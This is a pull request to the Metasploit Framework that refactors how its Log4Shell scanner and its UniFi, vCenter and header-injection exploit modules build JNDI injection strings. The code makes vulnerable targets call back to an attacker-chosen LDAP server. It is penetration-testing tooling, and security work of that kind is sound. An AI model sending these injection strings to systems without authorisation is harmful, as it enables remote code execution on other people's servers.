### PR TITLE
Updates for Log4Shell

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
@@ -44,7 +44,7 @@ RUN apt-get update && \
 	apt-get clean && \
 	rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
 
-RUN curl https://dlcdn.apache.org/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \
+RUN curl https://archive.apache.org/dist/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \
 	unzip struts-all.zip && \
 	cp /struts-2.5.28/apps/struts2-showcase.war /bitnami/tomcat/webapps/
 ```

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -32,10 +32,6 @@ module Exploit::Remote::JndiInjection
     "ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
   end
 
-  def log4j_jndi_string(resource = nil)
-    "${jndi:#{jndi_string(resource)}}"
-  end
-
   ## LDAP service callbacks
   #
   # Handle incoming requests via service mixin

--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@@ -27,8 +27,13 @@ module Exploit::Remote::JndiInjection
   # Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.
   #
   # @return [String] the JNDI string
-  def jndi_string
-    "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}"
+  def jndi_string(resource = nil)
+    resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
+    "ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
+  end
+
+  def log4j_jndi_string(resource = nil)
+    "${jndi:#{jndi_string(resource)}}"
   end
 
   ## LDAP service callbacks
@@ -130,7 +135,9 @@ module Exploit::Remote::JndiInjection
   end
 
   def validate_configuration!
-    fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') if ['0.0.0.0', '::'].include?(datastore['SRVHOST'])
+    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
+    end
   end
 end
 end

--- a/lib/msf/core/exploit/remote/log4_shell.rb
+++ b/lib/msf/core/exploit/remote/log4_shell.rb
@@ -1,0 +1,11 @@
+# -*- coding: binary -*-
+
+module Msf
+module Exploit::Remote::Log4Shell
+  include Exploit::Remote::JndiInjection
+
+  def log4j_jndi_string(resource = nil)
+    "${jndi:#{jndi_string(resource)}}"
+  end
+end
+end

--- a/modules/auxiliary/scanner/http/log4shell_scanner.rb
+++ b/modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::LDAP::Server
+  include Msf::Exploit::Remote::JndiInjection
   include Msf::Auxiliary::Scanner
 
   def initialize
@@ -67,65 +67,38 @@ class MetasploitModule < Msf::Auxiliary
     ])
   end
 
-  def jndi_string(resource)
-    "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}/${sys:java.vendor}_${sys:java.version}}"
+  def log4j_jndi_string(resource = '')
+    super(resource + '/${sys:java.vendor}_${sys:java.version}')
   end
 
   #
   # Handle incoming requests via service mixin
   #
-  def on_dispatch_request(client, data)
-    return if data.strip.empty?
-
-    data.extend(Net::BER::Extensions::String)
-    begin
-      pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
-      vprint_status("LDAP request data remaining: #{data}") if !data.empty?
-      resp = case pdu.app_tag
-             when Net::LDAP::PDU::BindRequest # bind request
-               client.authenticated = true
-               service.encode_ldap_response(
-                 pdu.message_id,
-                 Net::LDAP::ResultCodeSuccess,
-                 '',
-                 '',
-                 Net::LDAP::PDU::BindResult
-               )
-             when Net::LDAP::PDU::SearchRequest # search request
-               if client.authenticated || datastore['LDAP_AUTH_BYPASS']
-                 # Perform query against some loaded LDIF structure
-                 treebase = pdu.search_parameters[:base_object].to_s
-                 token, java_version = treebase.split('/', 2)
-                 target_info = @mutex.synchronize { @tokens.delete(token) }
-                 if target_info
-                   @mutex.synchronize { @successes << target_info }
-                   details = normalize_uri(target_info[:target_uri]).to_s
-                   details << " (header: #{target_info[:headers].keys.first})" unless target_info[:headers].nil?
-                   details << " (java: #{java_version})" unless java_version.blank?
-                   peerinfo = "#{target_info[:rhost]}:#{target_info[:rport]}"
-                   print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")
-                   report_vuln(
-                     host: target_info[:rhost],
-                     port: target_info[:rport],
-                     info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",
-                     name: name,
-                     refs: references
-                   )
-                 end
-                 nil
-               else
-                 service.encode_ldap_response(pdu.message_id, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)
-               end
-             else
-               vprint_status("Client sent unexpected request #{tag}")
-               client.close
-             end
-      resp.nil? ? client.close : on_send_response(client, resp)
-    rescue StandardError => e
-      print_error("Failed to handle LDAP request due to #{e}")
-      client.close
+  def build_ldap_search_response(msg_id, base_dn)
+    token, java_version = base_dn.split('/', 2)
+    target_info = @mutex.synchronize { @tokens.delete(token) }
+    if target_info
+      @mutex.synchronize { @successes << target_info }
+      details = normalize_uri(target_info[:target_uri]).to_s
+      details << " (header: #{target_info[:headers].keys.first})" unless target_info[:headers].nil?
+      details << " (java: #{java_version})" unless java_version.blank?
+      peerinfo = "#{target_info[:rhost]}:#{target_info[:rport]}"
+      print_good("#{peerinfo.ljust(21)} - Log4Shell found via #{details}")
+      report_vuln(
+        host: target_info[:rhost],
+        port: target_info[:rport],
+        info: "Module #{fullname} detected Log4Shell vulnerability via #{details}",
+        name: name,
+        refs: references
+      )
     end
-    resp
+
+    attrs = [ ]
+    appseq = [
+      base_dn.to_ber,
+      attrs.to_ber_sequence
+    ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
+    [ msg_id.to_ber, appseq ].to_ber_sequence
   end
 
   def rand_text_alpha_lower_numeric(len, bad = '')
@@ -136,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    fail_with(Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') if ['0.0.0.0', '::'].include?(datastore['SRVHOST'])
+    validate_configuration!
     @mutex = Mutex.new
     @tokens = {}
     @successes = []
@@ -190,7 +163,7 @@ class MetasploitModule < Msf::Auxiliary
 
       if uri.include?('${jndi:uri}')
         token = rand_text_alpha_lower_numeric(8..32)
-        jndi = jndi_string(token)
+        jndi = log4j_jndi_string(token)
         uri.delete_prefix!('/')
         test(token, uri: normalize_uri(target_uri, '') + uri.gsub('${jndi:uri}', Rex::Text.uri_encode(jndi)))
       else
@@ -203,7 +176,7 @@ class MetasploitModule < Msf::Auxiliary
     # HTTP_HEADER isn't exposed via the datastore but allows other modules to leverage this one to test a specific value
     unless datastore['HTTP_HEADER'].blank?
       token = rand_text_alpha_lower_numeric(8..32)
-      test(token, uri: uri, headers: { datastore['HTTP_HEADER'] => jndi_string(token) })
+      test(token, uri: uri, headers: { datastore['HTTP_HEADER'] => log4j_jndi_string(token) })
     end
 
     unless datastore['HEADERS_FILE'].blank?
@@ -212,16 +185,16 @@ class MetasploitModule < Msf::Auxiliary
         next if header.blank? || header.start_with?('#')
 
         token = rand_text_alpha_lower_numeric(8..32)
-        test(token, uri: uri, headers: { header => jndi_string(token) })
+        test(token, uri: uri, headers: { header => log4j_jndi_string(token) })
       end
     end
 
     token = rand_text_alpha_lower_numeric(8..32)
-    jndi = jndi_string(token)
+    jndi = log4j_jndi_string(token)
     test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/')), '/'))
 
     token = rand_text_alpha_lower_numeric(8..32)
-    jndi = jndi_string(token)
+    jndi = log4j_jndi_string(token)
     test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub('ldap://', 'ldap:${::-/}/'))))
   end
 

--- a/modules/auxiliary/scanner/http/log4shell_scanner.rb
+++ b/modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::Log4Shell
   include Msf::Auxiliary::Scanner
 
   def initialize

--- a/modules/exploits/multi/http/log4shell_header_injection.rb
+++ b/modules/exploits/multi/http/log4shell_header_injection.rb
@@ -5,7 +5,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::Log4Shell
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::CheckModule
   prepend Msf::Exploit::Remote::AutoCheck

--- a/modules/exploits/multi/http/log4shell_header_injection.rb
+++ b/modules/exploits/multi/http/log4shell_header_injection.rb
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_raw(
       'uri' => normalize_uri(target_uri),
       'method' => datastore['HTTP_METHOD'],
-      'headers' => { http_header => jndi_string }
+      'headers' => { http_header => log4j_jndi_string }
     )
     sleep(datastore['WfsDelay'])
     handler

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => {
         'username' => rand_text_alphanumeric(8..16), # can not be blank!,
         'password' => rand_text_alphanumeric(8..16), # can not be blank!
-        'remember' => jndi_string,
+        'remember' => log4j_jndi_string,
         'strict' => true
       }.to_json
     )

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -5,7 +5,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::Log4Shell
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 

--- a/modules/exploits/multi/http/vmware_vcenter_log4shell.rb
+++ b/modules/exploits/multi/http/vmware_vcenter_log4shell.rb
@@ -5,7 +5,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::Log4Shell
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::CheckModule
   prepend Msf::Exploit::Remote::AutoCheck

--- a/modules/exploits/multi/http/vmware_vcenter_log4shell.rb
+++ b/modules/exploits/multi/http/vmware_vcenter_log4shell.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # HTTP request initiator
     send_request_cgi(
       'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
-      'headers' => { 'X-Forwarded-For' => jndi_string }
+      'headers' => { 'X-Forwarded-For' => log4j_jndi_string }
     )
   end
 


### PR DESCRIPTION
This makes some Log4Shell updates. It refactors the scanner to reduce duplicate code, and fix a couple of minor bugs.

1. Adds and switches modules to use the Log4J-specific `log4j_jndi_string` method. This mistake was called out [here](https://github.com/rapid7/metasploit-framework/pull/16050#pullrequestreview-860242018), where the original `jndi_string` method was incorrect. Keeping the log4j strings in a mixin method will allow them to be updated for evasion later on.
2. Removes now redundant LDAP handler code in the scanner module. The JndiInjection mixin provides quite a bit, making it unnecessary to implement everything there.
3. Updates the `validate_configuration!` method to check for the bind-to-all-interfaces addresses correctly. This makes it more robust so it can't be fooled by IPv6 variations like `::`, `0::0`, `::0` etc.

## Testing
- [x] Setup a struts2 instance (docker steps in the [module docs](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md#apache-struts2-setup))
- [x] Run the scanning on multiple hosts (one or more should be vulnerable)
- [x] See that the affected hosts are identified as such